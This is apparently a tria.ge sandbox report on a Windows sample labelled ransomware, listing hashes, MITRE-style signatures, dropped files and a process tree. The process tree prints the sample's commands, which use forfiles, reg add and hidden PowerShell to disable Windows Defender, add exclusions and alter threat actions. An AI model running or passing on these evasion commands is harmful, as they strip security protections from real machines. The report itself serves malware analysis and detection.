Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
107s -
max time network
112s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/10/2024, 12:35
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win10v2004-20240910-en
General
-
Target
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
-
Size
6.7MB
-
MD5
bc58787697d3dfab922e9bbe376c7055
-
SHA1
06c8a66f338c809e73d1e7453b39b65be3558aec
-
SHA256
57dc9ae71f85b37c7968d4f3fea193ccb3d915d9afee8ec4fd165d3096f04561
-
SHA512
3648e7bf20cb61ec35979c8a9bcd2255ea79f83b9b29a23396dba72fd144e17cee380acf730c3ebcb2648f9d2d50cda766034ab543079e995496cb1cc21616ba
-
SSDEEP
196608:ebeOQSYdZtHckBGJ0soHJtOd4sGaVKJv2CSJG:EVYvVckBiQj5ak9S
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YIXdnjwIixpMFthL = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\UQYVlFmkpVlhWwVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YIXdnjwIixpMFthL = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JXqrxIFSrhCmC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CMKMbRFSZeNU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YjQMAHbWU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dLghTkXXJYUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2664 powershell.exe 1372 powershell.EXE 2428 powershell.EXE 2068 powershell.exe 588 powershell.EXE -
Indirect Command Execution 1 TTPs 6 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2756 forfiles.exe 2116 forfiles.exe 2944 forfiles.exe 2320 forfiles.exe 2844 forfiles.exe 2920 forfiles.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\manifest.json 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\JXqrxIFSrhCmC\JkkrEXE.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\JXqrxIFSrhCmC\bNBPzON.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\YjQMAHbWU\tahjDA.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\CMKMbRFSZeNU2\ftLashljJDlAu.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\ghynXMz.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\fQKBjnt.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\YjQMAHbWU\UvHLSvA.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\CMKMbRFSZeNU2\FswNVpR.xml 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe File created C:\Program Files (x86)\dLghTkXXJYUn\CdDrsyL.dll 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\GqmqubHZBeiIxpo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2220 1424 WerFault.exe 28 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2204 schtasks.exe 2708 schtasks.exe 2164 schtasks.exe 2684 schtasks.exe 3036 schtasks.exe 1628 schtasks.exe 540 schtasks.exe 2528 schtasks.exe 1736 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 2664 powershell.exe 2664 powershell.exe 2664 powershell.exe 1372 powershell.EXE 1372 powershell.EXE 1372 powershell.EXE 2428 powershell.EXE 2428 powershell.EXE 2428 powershell.EXE 2068 powershell.exe 588 powershell.EXE 588 powershell.EXE 588 powershell.EXE 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 1372 powershell.EXE Token: SeDebugPrivilege 2428 powershell.EXE Token: SeDebugPrivilege 2068 powershell.exe Token: SeIncreaseQuotaPrivilege 1680 WMIC.exe Token: SeSecurityPrivilege 1680 WMIC.exe Token: SeTakeOwnershipPrivilege 1680 WMIC.exe Token: SeLoadDriverPrivilege 1680 WMIC.exe Token: SeSystemProfilePrivilege 1680 WMIC.exe Token: SeSystemtimePrivilege 1680 WMIC.exe Token: SeProfSingleProcessPrivilege 1680 WMIC.exe Token: SeIncBasePriorityPrivilege 1680 WMIC.exe Token: SeCreatePagefilePrivilege 1680 WMIC.exe Token: SeBackupPrivilege 1680 WMIC.exe Token: SeRestorePrivilege 1680 WMIC.exe Token: SeShutdownPrivilege 1680 WMIC.exe Token: SeDebugPrivilege 1680 WMIC.exe Token: SeSystemEnvironmentPrivilege 1680 WMIC.exe Token: SeRemoteShutdownPrivilege 1680 WMIC.exe Token: SeUndockPrivilege 1680 WMIC.exe Token: SeManageVolumePrivilege 1680 WMIC.exe Token: 33 1680 WMIC.exe Token: 34 1680 WMIC.exe Token: 35 1680 WMIC.exe Token: SeDebugPrivilege 588 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1424 wrote to memory of 2444 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 29 PID 1424 wrote to memory of 2444 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 29 PID 1424 wrote to memory of 2444 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 29 PID 1424 wrote to memory of 2444 1424 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe 29 PID 2444 wrote to memory of 2844 2444 cmd.exe 31 PID 2444 wrote to memory of 2844 2444 cmd.exe 31 PID 2444 wrote to memory of 2844 2444 cmd.exe 31 PID 2444 wrote to memory of 2844 2444 cmd.exe 31 PID 2844 wrote to memory of 2848 2844 forfiles.exe 32 PID 2844 wrote to memory of 2848 2844 forfiles.exe 32 PID 2844 wrote to memory of 2848 2844 forfiles.exe 32 PID 2844 wrote to memory of 2848 2844 forfiles.exe 32 PID 2848 wrote to memory of 2928 2848 cmd.exe 33 PID 2848 wrote to memory of 2928 2848 cmd.exe 33 PID 2848 wrote to memory of 2928 2848 cmd.exe 33 PID 2848 wrote to memory of 2928 2848 cmd.exe 33 PID 2444 wrote to memory of 2920 2444 cmd.exe 34 PID 2444 wrote to memory of 2920 2444 cmd.exe 34 PID 2444 wrote to memory of 2920 2444 cmd.exe 34 PID 2444 wrote to memory of 2920 2444 cmd.exe 34 PID 2920 wrote to memory of 2832 2920 forfiles.exe 35 PID 2920 wrote to memory of 2832 2920 forfiles.exe 35 PID 2920 wrote to memory of 2832 2920 forfiles.exe 35 PID 2920 wrote to memory of 2832 2920 forfiles.exe 35 PID 2832 wrote to memory of 2788 2832 cmd.exe 36 PID 2832 wrote to memory of 2788 2832 cmd.exe 36 PID 2832 wrote to memory of 2788 2832 cmd.exe 36 PID 2832 wrote to memory of 2788 2832 cmd.exe 36 PID 2444 wrote to memory of 2756 2444 cmd.exe 37 PID 2444 wrote to memory of 2756 2444 cmd.exe 37 PID 2444 wrote to memory of 2756 2444 cmd.exe 37 PID 2444 wrote to memory of 2756 2444 cmd.exe 37 PID 2756 wrote to memory of 3028 2756 forfiles.exe 38 PID 2756 wrote to memory of 3028 2756 forfiles.exe 38 PID 2756 wrote to memory of 3028 2756 forfiles.exe 38 PID 2756 wrote to memory of 3028 2756 forfiles.exe 38 PID 3028 wrote to memory of 2636 3028 cmd.exe 39 PID 3028 wrote to memory of 2636 3028 cmd.exe 39 PID 3028 wrote to memory of 2636 3028 cmd.exe 39 PID 3028 wrote to memory of 2636 3028 cmd.exe 39 PID 2444 wrote to memory of 2116 2444 cmd.exe 40 PID 2444 wrote to memory of 2116 2444 cmd.exe 40 PID 2444 wrote to memory of 2116 2444 cmd.exe 40 PID 2444 wrote to memory of 2116 2444 cmd.exe 40 PID 2116 wrote to memory of 3024 2116 forfiles.exe 41 PID 2116 wrote to memory of 3024 2116 forfiles.exe 41 PID 2116 wrote to memory of 3024 2116 forfiles.exe 41 PID 2116 wrote to memory of 3024 2116 forfiles.exe 41 PID 3024 wrote to memory of 2792 3024 cmd.exe 42 PID 3024 wrote to memory of 2792 3024 cmd.exe 42 PID 3024 wrote to memory of 2792 3024 cmd.exe 42 PID 3024 wrote to memory of 2792 3024 cmd.exe 42 PID 2444 wrote to memory of 2944 2444 cmd.exe 43 PID 2444 wrote to memory of 2944 2444 cmd.exe 43 PID 2444 wrote to memory of 2944 2444 cmd.exe 43 PID 2444 wrote to memory of 2944 2444 cmd.exe 43 PID 2944 wrote to memory of 2948 2944 forfiles.exe 44 PID 2944 wrote to memory of 2948 2944 forfiles.exe 44 PID 2944 wrote to memory of 2948 2944 forfiles.exe 44 PID 2944 wrote to memory of 2948 2944 forfiles.exe 44 PID 2948 wrote to memory of 2664 2948 cmd.exe 45 PID 2948 wrote to memory of 2664 2948 cmd.exe 45 PID 2948 wrote to memory of 2664 2948 cmd.exe 45 PID 2948 wrote to memory of 2664 2948 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2928
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2788
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2636
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3024 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2792
-
-
-
-
